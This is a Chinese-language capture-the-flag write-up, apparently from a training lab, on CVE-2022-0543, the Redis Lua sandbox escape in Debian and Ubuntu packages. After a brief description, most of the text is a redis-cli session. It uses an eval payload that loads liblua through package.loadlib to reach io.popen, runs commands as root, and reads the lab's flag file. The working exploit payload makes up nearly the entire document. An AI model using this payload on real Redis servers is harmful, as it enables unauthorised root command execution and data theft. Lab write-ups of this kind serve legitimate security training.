CVE-2022-0543
信息
Redis 是著名的开源 Key-Value 数据库,其具备在沙箱中执行 Lua 脚本的能力。 Debian 以及 Ubuntu 发行版的源在打包 Redis 时,不慎在 Lua 沙箱中遗留了一个对象 package,攻击者可以利用这个对象提供的方法加载动态链接库 liblua 里的函数,进而逃逸沙箱执行任意命令。
直接根据漏洞信息,交互即可
┌──(randark㉿kali)-[~]
└─$ redis-cli -h e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com -p 37330
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> KEYS *;
(empty array)
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
"uid=0(root) gid=0(root) groups=0(root)\n"
(10.12s)
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("pwd", "r"); local res = f:read("*a"); f:close(); return res' 0
"/var/lib/redis\n"
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("ls -lh /", "r"); local res = f:read("*a"); f:close(); return res' 0
"total 4.0K\nlrwxrwxrwx 1 root root 7 Mar 2 2022 bin -> usr/bin\ndrwxr-xr-x 2 root root 10 Apr 15 2020 boot\ndrwxr-xr-x 5 root root 360 Apr 23 14:41 dev\ndrwxr-xr-x 1 root root 86 Apr 23 14:41 etc\n-rwxr-xr-x 1 root root 152 Dec 11 05:58 flag.sh\ndrwxr-xr-x 2 root root 10 Apr 15 2020 home\nlrwxrwxrwx 1 root root 7 Mar 2 2022 lib -> usr/lib\nlrwxrwxrwx 1 root root 9 Mar 2 2022 lib32 -> usr/lib32\nlrwxrwxrwx 1 root root 9 Mar 2 2022 lib64 -> usr/lib64\nlrwxrwxrwx 1 root root 10 Mar 2 2022 libx32 -> usr/libx32\ndrwxr-xr-x 2 root root 10 Mar 2 2022 media\ndrwxr-xr-x 2 root root 10 Mar 2 2022 mnt\ndrwxr-xr-x 2 root root 10 Mar 2 2022 opt\ndr-xr-xr-x 4344 root root 0 Apr 23 14:41 proc\ndrwx------ 2 root root 49 Mar 2 2022 root\ndrwxr-xr-x 1 root root 29 Apr 23 14:41 run\nlrwxrwxrwx 1 root root 8 Mar 2 2022 sbin -> usr/sbin\ndrwxr-xr-x 2 root root 10 Mar 2 2022 srv\ndr-xr-xr-x 13 root root 0 Apr 23 14:41 sys\ndrwxrwxrwt 1 root root 30 Apr 23 14:41 tmp\ndrwxr-xr-x 1 root root 57 Mar 2 2022 usr\ndrwxr-xr-x 1 root root 40 Mar 2 2022 var\n"
(2.38s)
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("/flag.sh", "r"); local res = f:read("*a"); f:close(); return res' 0
"18:C 23 Apr 2025 14:45:23.601 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo\n18:C 23 Apr 2025 14:45:23.601 # Redis version=5.0.7, bits=64, commit=00000000, modified=0, pid=18, just started\n18:C 23 Apr 2025 14:45:23.601 # Configuration loaded\n18:M 23 Apr 2025 14:45:23.601 # Could not create server TCP listening socket 0.0.0.0:6379: bind: Address already in use\n"
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /flag.sh", "r"); local res = f:read("*a"); f:close(); return res' 0
"#!/bin/bash\n# \xe8\xbe\x93\xe5\x87\xba\xe7\x8e\xaf\xe5\xa2\x83\xe5\x8f\x98\xe9\x87\x8f $flag \xe7\x9a\x84\xe5\x86\x85\xe5\xae\xb9\xe5\x88\xb0 /tmp/flag.txt\necho $flag > /tmp/flag.txt\n# \xe6\x89\xa7\xe8\xa1\x8c\xe7\x9a\x84\xe5\x90\xaf\xe5\x8a\xa8\xe8\x84\x9a\xe6\x9c\xac\nredis-server /etc/redis/redis.conf\n"
(1.62s)
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /tmp/flag.txt", "r"); local res = f:read("*a"); f:close(); return res' 0
"go-flag{c0c62457-e009-451b-9ec9-557b674bec1e}\n"